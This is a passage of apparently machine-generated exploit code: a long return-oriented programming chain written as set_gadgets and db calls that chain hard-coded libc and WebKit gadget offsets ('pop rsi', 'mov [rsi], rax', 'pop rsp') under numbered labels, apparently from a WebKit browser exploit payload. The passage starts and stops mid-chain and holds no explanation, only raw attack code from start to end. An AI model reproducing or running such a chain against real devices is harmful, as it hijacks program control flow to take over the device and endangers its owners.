//L3323: libc_base+764760, //pop rsi ropchain+200144, //L3324 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3324: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3326: db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+200264, //L3329 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+200248, //L3327 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3327: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3329: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+200408, //L3332 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+200376, //L3330 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+200392, //L3331 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3330: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3331: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3332: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+200496, //L3334 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L3333: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L3334: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+200552, //L3335 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3335: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi //L3337: db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+200632, //L3339 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3339: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+196704, //L3233 //L3271: //L3217: //L3340: libc_base+764760, //pop rsi ropchain+200728, //L3341 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3341: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3343: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+200848, //L3346 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+200832, //L3344 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3344: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3346: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+201040, //L3351 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+201056, //L3352 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+200992, //L3348 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+201024, //L3350 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3348: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi 
//L3349: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3350: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3351: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3352: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+201168, //L3353+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+201160, //L3353 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3353: db([0, 0]); // 0x0 set_gadgets([ ropchain+201184, //L3353+24 ropchain+205424, //L3347 libc_base+764760, //pop rsi ropchain+201224, //L3354 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3354: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3356: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+201344, //L3359 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+201328, //L3357 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3357: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3359: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+201488, //L3362 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+201456, //L3360 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+201472, //L3361 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3360: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3361: db([0, 
0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3362: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+201568, //L3363 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3363: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3365: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+201688, //L3368 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+201672, //L3366 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3366: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3368: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+201832, //L3371 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+201800, //L3369 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+201816, //L3370 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3369: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3370: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3371: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+201920, //L3373 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L3372: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L3373: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi 
libc_base+764760, //pop rsi ropchain+201976, //L3374 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3374: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3376: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+202056, //L3378 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3378: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+202168, //L3379 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3379: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3381: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+202288, //L3384 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+202272, //L3382 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3382: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3384: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+202432, //L3387 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+202400, //L3385 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+202416, //L3386 webkit_base+660161, //mov [rsi], rax ; mov al, 
1 libc_base+763368 //pop rcx ]); //L3385: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3386: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3387: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+202512, //L3388 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3388: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3390: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+202632, //L3393 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+202616, //L3391 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3391: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3393: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+202776, //L3396 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+202744, //L3394 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+202760, //L3395 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3394: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3395: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3396: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+202848, //L3398 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3398: db([0, 0]); // 0x0 
set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+202904, //L3399 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3399: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+202984, //L3401 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3401: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3403: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+203104, //L3406 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+203088, //L3404 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3404: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3406: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+203264, //L3410 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+203216, //L3407 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+203232, //L3408 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3407: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3408: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3409: db([4294967295, 4294967295]); // -0x1 set_gadget(libc_base+759608,); //pop rax //L3410: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+203320, //L3411 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 
libc_base+763368 //pop rcx ]); //L3411: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3413: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+853989, //mov rax, rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+203448, //L3415 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3415: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+203504, //L3416 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3416: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+203648, //L3419 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+203664, //L3420 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+203632, //L3418 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3418: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3419: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3420: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+203824, //L3424 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+203792, //L3422 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+203808, //L3423 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3421: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3422: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3423: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3424: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+203880, //L3426 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3426: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+204008, //L3428 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+204024, //L3429 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+203992, //L3427 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3427: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3428: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3429: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+204184, //L3433 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+204152, //L3431 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+204168, //L3432 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3430: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3431: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3432: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3433: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+204240, //L3435 webkit_base+660161, //mov [rsi], rax ; mov 
al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3435: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+204368, //L3437 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+204384, //L3438 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+204352, //L3436 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3436: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3437: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3438: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+204544, //L3442 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+204512, //L3440 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+204528, //L3441 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3439: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3440: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3441: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3442: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+204600, //L3444 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3444: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+204728, //L3446 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+204744, //L3447 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 
libc_base+764760, //pop rsi ropchain+204712, //L3445 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3445: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3446: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3447: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+204824, //L3448 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+204840, //L3449 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3448: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3449: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+204936, //L3451 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+204920, //L3450 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3450: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3451: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+205016, //L3452 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3452: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3454: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+205136, //L3457 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+205120, //L3455 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3455: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3457: db([0, 
0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+205216, //L3459 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+205248, //L3461 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3459: db([0, 0]); // 0x0 set_gadgets([ libc_base+759608, //pop rax //L3460: ropchain+205376, //L3458 libc_base+144605 //pop rdi ]); //L3461: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+205352, //L3463 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+205368, //L3462 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L3463: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L3462: db([0, 0]); // 0x0 //L3458: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+205440, //L3464 //L3347: libc_base+782311, //pop rsp ropchain+205456, //L3465 //L3464: libc_base+782311, //pop rsp ropchain+200688, //L3340 //L3465: libc_base+764760, //pop rsi ropchain+205496, //L3466 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3466: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3468: db([72, 0]); // 0x48 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+205616, //L3471 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+205600, //L3469 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); 
//L3469: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3471: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+205792, //L3474 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+205808, //L3475 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+205760, //L3472 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+205776, //L3473 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3472: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3473: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3474: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3475: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+205904, //L3477 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+205888, //L3476 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3476: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3477: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3478: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3479: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L3480: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, 
//sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+206104, //L3482 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3482: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+206160, //L3483 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3483: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+206296, //L3487 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+206280, //L3486 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3485: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3486: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3487: db([0, 0]); // 0x0 